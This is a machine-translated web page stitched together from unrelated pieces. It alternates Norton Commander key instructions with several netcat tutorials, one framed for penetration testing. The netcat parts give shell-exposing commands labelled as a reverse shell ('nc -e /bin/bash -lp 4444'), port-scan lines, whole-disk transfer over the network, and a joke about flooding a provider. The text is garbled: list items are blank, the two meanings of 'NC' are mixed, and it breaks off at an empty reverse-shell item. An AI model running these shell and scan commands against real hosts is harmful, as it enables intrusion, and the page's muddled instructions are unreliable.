Basic NC commands are called by the function keys F1 - F10. A list of these commands is located on the bottom information line of the screen.

A) Hint, help, Help, F1 (Fig. 2, 3).

When you press this key, the following appears on the screen: a brief description of the Norton Commander system and a tooltip describing the purpose of the keys and commands.

b) user menu, Menu, F2 (Fig. 4)

Using this command, an additional menu created by the user is called up on the screen.

V) viewing the contents of the file, View, F3 (Fig. 5).

The cursor must be placed on the name of the file whose contents you want to view and press the F3 key. The contents of the file will be displayed on the monitor screen, which can be seen and read, but cannot be edited.

G) Editing text, Edit, F4 (Fig. 6)

To load a file into the built-in Norton Commander editor, you need to point to the file with the cursor and press F4. For editing purposes, you can move the cursor using the cursor keys. The built-in editor Norton Commander can work with a file whose size does not exceed 30 KB. For large files, an external editor is used if configured in Norton Commander. To load a file into an external editor, use the command called by pressing ALT+ F4.

d) Copying files and directories, Copy, F5 (Fig. 7, 8, 9)

To copy a file, you need to determine the directory where it is located (source) and where it will be copied (destination). In the passive panel you need to open the destination directory, and in the active panel - the source directory. In the latter, you need to point the cursor to the file to be copied and press F5. In the dialog box that appears, after pressing F5, you need to confirm the copying. If necessary, here you can correct the name of the destination directory or give a different name for the copy file.

When copying a group of files, you must first mark them by moving the cursor to the name the desired file and press the Insert key. The name of the marked file will change color and background. To uncheck the file where the cursor is located, just press the Insert key again. Copying is done by pressing the F5 key. In the dialog box that appears, you need to confirm copying both a single file and a group of (all) files.

If you need to copy all the files in a directory, then to select them just press the * key on the small numeric keypad. To cancel the selection, press this key again.

If you need to copy all the files of a certain group, then to select them just press the single sign + key on the small numeric keypad and in the dialog box that appears, select the group attribute and press Enter. Conversely, to cancel a selection, press the single minus sign (-) key and press Enter.

To inversely select, press the * key on the small numeric keypad.

The group characteristics indicated when copying are quite multiple. Some examples are shown in Table 1. Table 1

Hello Dear Reader X!

I think this drawing can be called a mini-test “Are you a hacker?” Try to say that
means this funny kitten. Well, if difficulties still arise, know that in front of you is the most favorite thing of all advanced people, one way or another
associated with the Network, and its name is Netcat.

Netcat is a utility that allows you to read and transfer data over network
connections. In other words, Netcat allows you to connect to anything and do anything. Netcat is absolutely self-sufficient; if used correctly, it can replace any software tool, including even those known to you
Apache. So, in its simplest version, Netcat allows you to create TCP and UDP connections from any to any port, can “listen” to incoming connections (and you can order the “kitten” to wait for connections only from the addresses and even ports you specify!), can scan ports, allow DNS queries, send any commands from standard input, perform predefined actions in response to a connection that the “kitten” is listening to, make a Hex dump of sent and received data and much, much more...

Although, I think it was necessary to say from the very beginning that Netcat can do everything; and the possibilities of its use are limited only by the level of your knowledge and your imagination. Initially, Netcat was conceived as a Unix utility, but as you understand, there could not but be enthusiasts who would not port the “kitten” to Windows. You can easily find both versions in search engines using the query “Netcat”. But the benefits, of course, go to Unix-oids, which, when compiled, can slightly correct the “kitten” and thereby activate the “additional features” features that are disabled by default.

If you have ever used “software-based attacks”, or simply put exploits, then you probably noticed that more than half of them use Netcat in one way or another. This is primarily due to the fact that Netcat never modifies incoming data in any way (as well as outgoing), unlike, say, a Telnet client, which first interprets incoming data and only then gives it to you. This is why Netcat has become powerful tool searching and exploiting vulnerabilities, thanks to which Bugtraq was replenished with hundreds of new postings.

But, if searching for vulnerabilities is not your thing, you can try using Netcat as a web browser, or, say, mail client; especially since in Internet Explorer and Outlook found “fresh” holes, good old Unicode, heh... Moreover, our Russian guys distinguished themselves in this field (! National pride plays a role!). If you are reading this article using Explorer, go and see how "Donkey" you are.
holey

After this, you’ll switch to Netcat - it’s not very convenient, but
safe... And finally, examples of “advanced” use of Netcat
(Unix):

1. Netcat like ;
2. Netcat as utility " "; these are often described in X, but in reality they simply send requests to search engines well known to you... Your “kitten” can also do this useful work!;
3. Netcat like ! Make the provider rest!!!

Please note that everything is done in the form of shell scripts, so you can correct anything if necessary.
For this I want to say goodbye. Read the manuals, and good luck in learning the iconic Netcat utility!

P.S./Personal/: The site http://georgy.h1.ru/ is closed by me. Once and for all. Thanks to everyone who was my guest.

In this article I will look at the popular network utility netcat and useful tricks when working with it.

Netcat is a Unix utility that allows you to establish TCP and UDP connections, receive data from there and transmit it. Despite its usefulness and simplicity, many do not know how to use it and undeservedly bypass it.

Using this utility, you can perform some steps when conducting penetration testing. This can be useful when the attacked machine does not have installed packages (or attracts attention), there are restrictions (for example, IoT/Embedded devices), etc.

What you can do with netcat:

• Scan ports;
• Forward ports;
• Collect service banners;
• Listen to port (bind for reverse connection);
• Download and upload files;
• Output raw HTTP content;
• Create a mini-chat.

In general, with the help of netcat you can replace some of the Unix utilities, so this tool can be considered a kind of combine for performing certain tasks.

Practical examples

In many cases, if it is necessary to check a particular host, they use telnet or their own service services to identify the host or banner. How netcat can help us:

Checking for open TCP port 12345

$ nc -vn 192.168.1.100 12345

nc: connect to 192.168.1.100 12345 (tcp) failed: Connection refused

$ nc -v 192.168.1.100 22

Connection to 192.168.1.100 22 port succeeded!
SSH-2.0-OpenSSH

Scanning TCP ports with netcat:

$ nc -vnz 192.168.1.100 20-24

With such a scan there will be no connection to the port, but only an output of a successful connection:

nc: connectx to 192.168.1.100 port 20 (tcp) failed: Connection refused
nc: connectx to 192.168.1.100 port 21 (tcp) failed: Connection refused
found 0 associations
found 1 connections:
1: flags=82
outif en0
src 192.168.1.100 port 50168
dst 192.168.1.100 port 22
rank info not available
TCP aux info available
Connection to 192.168.1.100 port 22 succeeded!
nc: connectx to 192.168.1.100 port 23 (tcp) failed: Connection refused
nc: connectx to 192.168.1.100 port 24 (tcp) failed: Connection refused

Scanning UDP ports.

To scan UDP ports with nmap, you need root privileges. If they are not there, in this case the netcat utility can also help us:

$ nc -vnzu 192.168.1.100 5550-5560

Connection to 192.168.1.100 port 5555 succeeded!

Sending a UDP packet

$ echo -n "foo" | nc -u -w1 192.168.1.100 161

This can be useful when interacting with network devices.

Receiving data on a UDP port and outputting received data

$ nc -u localhost 7777

After the first message, output will stop. If you need to accept multiple messages, you must use while true:

$ while true; do nc -u localhost 7777; done

File transfer. Using netcat you can both receive files and transfer them to a remote host:

nc 192.168.1.100 5555< 1.txt
nc -lvp 5555 > /tmp/1.txt

Netcact as a simple web server.

Netcat can act as a simple web server to display HTML pages.

$ while true; do nc -lp 8888< index.html; done

Using a browser at: http://netcat host:8888/index.html. To use the standard web server port number 80, you will have to run nc with root privileges:

$ while true; do sudo nc -lp 80< test.html; done

Chat between nodes

On the first node (192.168.1.100):

$nc -lp 9000

On the second node:

$nc 192.168.1.100 9000

After executing the commands, all characters entered into the terminal window on any node will appear in the terminal window of the other node.

Reverse shell

Using netcat you can organize a convenient reverse shell:

nc -e /bin/bash -lp 4444

Now you can connect from the remote host:

$nc 192.168.1.100 4444

You shouldn’t give up if you don’t have certain tools, often quite cumbersome; sometimes the problem can be solved with improvised means.

Instructions for working inNortonCommander

To start the NC system in command line DOS type the NC command or left-click on the NC icon on the computer desktop. To finish working with NC, press the key [ F10] . In the dialog box that appears, select the answer “Yes” if you log out of the system, “No” otherwise. Selecting an answer option is performed using the cursor keys on the functional keyboard and then pressing the key [ Enter] . The bottom of the screen contains the DOS command line, where you can enter the appropriate commands while working under NC control. The lowest line of the screen contains a hint line, which indicates the purpose of the main “hot” keys that correspond to NC (and DOS) commands.

After starting NC, two panels appear on the screen - left and right. At the top of each panel, a small rectangular window shows the full path to the current file or directory. The panel in which the highlighted rectangle, the cursor, is located is called active. To move from panel to panel, use the key . If the top line on the panel and the image are selected “…” this means that you are in the directory with the name shown at the top of the panel. The following commands are used to work with panels:

[ Ctrl] + [ F1] Hide/show left panel

[ Ctrl] + [ F2] Hide/show right panel

[ Ctrl] + [ U] Swap panels

[ Ctrl] + [ O] Hide/show both panels

[ Ctrl] + [ P]Hide/show inactive panel

To change the logical disk name, click on the left panel [ Alt] + [ F1] , in the dialog box that appears, use the cursor keys to select the desired disk name from the proposed names, press the key [ Enter] . For the right panel, the actions are similar, but at the beginning you should click [ Alt] + [ F2] .

To go to the directory, select it on the active panel and press the key [ Enter] . To go to a higher-level directory on the active panel, select the line “…” and press the key [ Enter] .

The following commands are used to work with directories:

[ F7] – create a directory. In the dialog box that appears, specify a new directory name;

[ F8] – delete directory. In the dialog box that appears, confirm the deletion or cancel the deletion by pressing the Esc key.

The following commands are used to work with files:

[ Shift] + [ F4] – create a file. In the dialog box that appears, enter a new file name (don’t forget to specify the extension). After the file name has been set, type the contents of the file into the screen workspace. Complete file creation with command [ Ctrl] + [ Z]. To save the file, press the key [ F2] . Exit editing mode with the key [ F10 ] .

[ F4] – editing a previously created document. In this case, you must specify the name of the file to be edited in the dialog box. When working in editing mode, a hint line appears in the screen space at the bottom with the assignment of hot keys in editing mode.

[ Shift] + [ F2] – save the file with a new name.

[ F3] – view file contents. To do this, first select the file in the panel.

[ F5] – file copying. All operations with files and directories are performed using both panels. To copy a file, on an inactive panel, set the directory where the copied file will be placed, go to this directory. On the active panel, select the file to be copied and press the key [ F5] . To confirm copying, press the key [ Enter] , to cancel – .

[ F6] – transfer/rename file. The operation is similar to copying. To move a file, on an inactive panel, set the directory where the file will be placed and go to this directory. In the active panel, select the file to be moved and press the key [ F6] . To rename a file, specify a new file name in the dialog box by adding it via the icon ” \ ” in indicating the path. It is necessary to remember that the moved file is deleted from its original location.

[ F9] – go to menuNC.

Group operations on files

Copy, move, and delete operations can be performed on several files simultaneously. To do this, you need to mark them by highlighting them on the panel and pressing the key [ Insert] . In this case, the selected files are highlighted with rectangles of a contrasting color. To remove the selection, repeat these steps. After the file selection procedure, the required operation (copying, moving, deleting) is performed on the group of files as if it were one. The second way to select a file is by pressing the large gray key ”+” on the function keyboard on the left. After pressing this key, you should specify the file name in the dialog box or specify the file names when using a mask in the name: “ * ”, “ *.* ”, “ ? ”. To deselect files, use the “-” key on the functional keyboard on the left.

System Menu NC

The menu system is designed to customize the shell and make operations easier. The menu bar is called up by pressing a key [ F9] . The menu system consists of a menu bar and drop-down menus. The menu contains the following items: Right Files Commands Settings Left . Teams Right And Left determine the choice of file display mode on the panel. All command options for the left and right panels are identical. Team Files designed to perform operations on files and directories. Menu item Teams is intended for executing additional commands. Team Settings is intended for setting up the NC environment. Selecting the appropriate command is done using the cursor keys and then pressing [ Enter].

Menu item Left (Right).

The drop-down menu of this command contains options for selecting the format for displaying the file on the screen. In mode Brief The panel displays only file and directory names. In mode Full The name of the file or directory is displayed, for a file its size is indicated, for a directory - the string “subdirectory”, the date and time of creation of the file and directory. In mode Tree You can display the directory tree of the current drive and use the cursor to quickly find the required file by moving through the tree. The next group of options for this menu item determines the order in which files are displayed on the panel. In this case, files can be arranged in any order - mode No sorting , but can be arranged in a specific order: Name – by name in alphabetical order, Extension – by extension in alphabetical order, Time – by creation date, with files with the latest creation dates located at the beginning of the list, Size – by file size in descending order. Selecting the line of the corresponding mode is carried out by the cursor and setting the checkbox using the “space” key.

Menu item Files .

The drop-down menu of this command contains a description of the purpose of the hotkeys [ F1] - [ F8] , i.e. hotkey actions are duplicated by menu commands. The next option is Set Attributes. Attributes are set only for files. The order of setting attributes is as follows: select a file with the cursor on the panel. After this, pressing the key [ F9] go to the NC menu and select the item Files Installation attributes . After pressing the key [ Enter] A list of possible attributes appears in the dialog box: Read-only, Archive, Hidden, System. Selecting a file attribute line is done with the cursor and checking the box using the spacebar. In this case, the file with attributes Read-only cannot be modified and is only available for viewing. Attributes file Hidden on the panel is marked with a small highlighted rectangle (if the option is not set in the screen settings Show hidden files The file name is not displayed on the panel at all). The next group of commands allows you to select files (similar to the big gray key ”+” ), deselect (analogous to the key ” - ” on the function keyboard), invert selection (analogous to the ” * ” on the function keyboard).

Menu item Teams .

The drop-down menu of this command allows you to create a user menu, edit this menu, view the history of commands entered at the DOS command line, and contains other additional features of the NC shell.

Menu item Settings.

The drop-down menu of this command allows you to configure the interface environment in a user-friendly manner. Contains option Settings Editor and others. When you select the Settings menu bar, a set of dialog boxes opens that allow you to select a color set for the screen, set the number of lines on the screen, etc. Dialog box Panel Settings allows Show hidden files, if the corresponding checkbox is checked (or do not show). Checking the corresponding option boxes is also done using the cursor and the spacebar.

Laboratory assignment

Displaying a test HTML page to a client with a regular browser with one command (port 8080):
(echo -e "HTTP/1.1 200 OK\nContent-Type: text/html\n\n Hello World";) | nc -vv -l -p 8080
Transferring a file to a client with a regular browser with one command (port 8080):
(echo -e "HTTP/1.1 200\nContent-Disposition: attachment; filename=target-name-that-client-will-see\nContent-Type: application/octet-stream\nConnection: close\n"; cat filename- on-disk) | nc -vv -l -p 8080

How to use nc?

(http://handynotes.ru/2010/01/unix-utility-netcat.html )

Let's start with a few simple examples and then use them as basic ones.
If you remember, I said that netcat is a Swiss army knife. What would this knife be if it couldn't be used like a regular knife? This is why netcat can be used instead of regular telnet:

$nc www.google.com 80

It's actually more convenient than regular telnet because you can end the connection at any time by pressing Ctrl+C and it treats binary data as normal (no escape sequences, nothing).
You can add the -v option to display the results of actions in more detail, and the (-vv) option to get statistics about how many bytes were transferred during the current connection session.
Netcat can be used as a server. If you run it as below, it will listen on port 12345 (on all interfaces):

$ nc -l -p 12345

Now if you connect to port 12345 of this host, everything you type will be sent to the remote side, which tells us that netcat can be used as a chat server. Run on one of the computers:

# On computer A with IP 10.10.10.10
$ nc -l -p 12345

And connect to it from another:

# On computer B
$nc 10.10.10.10 12345

Now both sides can talk!
This way of talking, where both parties can talk to each other, makes it possible to use nc for I/O operations over the network! For example, you can send an entire directory from one computer to another by running a tar pipeline via nc on the first computer, and redirecting the output to another tar process on the second.
Let's say you want to send files from the /data directory of computer A with IP 192.168.1.10 to computer B (with any IP). It's simple:

$tar -cf - /data | nc -l -p 6666

# On computer B
$nc 192.168.1.10 6666 | tar -xf -

Don't forget to combine the pipeline with Pipe Viewer, which was described in the previous article, to see statistics on how quickly the transfer occurs!
A single file can be sent more simply:

# On computer A with IP 192.168.1.10
$ cat file | nc -l -p 6666

# On computer B
$nc 192.168.1.10 6666 > file

You can even copy and restore an entire disk using nc:

# On computer A with IP 192.168.1.10
$ cat /dev/hdb | nc -l -p 6666

# On computer B
$ nc 192.168.1.10 6666 > /dev/hdb

Note: The “-l” option cannot be used in conjunction with “-p” on Mac computers! The solution is to simply replace “-l -p 6666? to “-l 6666?. Like here:

# now nc listens on port 6666 for Mac computers
$nc -l 6666

A common use of netcat is port scanning. Netcat is not the best tool for this kind of work, but it gets the job done (the best, of course, is nmap):

$ nc -v -n -z -w 1 192.168.1.2 1-1000
(UNKNOWN) 445 (microsoft-ds) open
(UNKNOWN) 139 (netbios-ssn) open
(UNKNOWN) 111 (sunrpc) open
(UNKNOWN) 80 (www) open
(UNKNOWN) 25 (smtp) : Connection timed out
(UNKNOWN) 22 (ssh) open

The -n option prevents DNS lookups, -z does not wait for a response from the server, and -w 1? sets the connection timeout to 1 second.
Another non-trivial use of netcat is as a proxy. Both port and host can be forwarded. Look at this example:

$ nc -l -p 12345 | nc www.google.com 80

This command runs nc on port 1234 and redirects all connections to google.com:80. If you now connect to this computer on port 12345 and make a request, you will find that you do not receive any data in response. This is correct because we have not established a bidirectional channel. If you add a second channel, you will receive your data on a different port:

$ nc -l -p 12345 | nc www.google.com 80 | nc -l -p 12346

After sending a request to port 12345, receive your response data on port 12346.
Probably the most powerful feature of netcat is to run any process as a server:

$ nc -l -p 12345 -e /bin/bash

The -e option causes input and output to be redirected through the network socket. Now, if you connect to the host on port 12345, you can use bash:
$nc localhost 12345
ls-las
total 4288
4 drwxr-xr-x 15 pkrumins users 4096 2009-02-17 07:47 .
4 drwxr-xr-x 4 pkrumins users 4096 2009-01-18 21:22 ..
8 -rw——- 1 pkrumins users 8192 2009-02-16 19:30 .bash_history
4 -rw-r—r— 1 pkrumins users 220 2009-01-18 21:04 .bash_logout

(http://execbit.ru/2011/05/23/netcat/)
1 Transfer files (we execute the first command on the receiving machine, the second on the sending machine:

$ nc -l 31334 > filename $ nc 172.16.69.143 31334< filename

$ nc -f /var/log/messages | nc -l 31334 $ nc 172.16.69.143 31334

3 Use instead of telnet (the first is the telnet server, the second is the client):

$ nc -l -p 31334 -e /bin/sh $ nc 172.16.69.143 31334

4 Scan to open ports:

$ nc -z execbit.ru 1-1024

5 Fingerprint services based on banners:

$ echo "QUIT" | nc execbit.ru 1-1024

6 Organize a reverse shell (the first is the client, the second is the server, but the shell will open from the server to the client).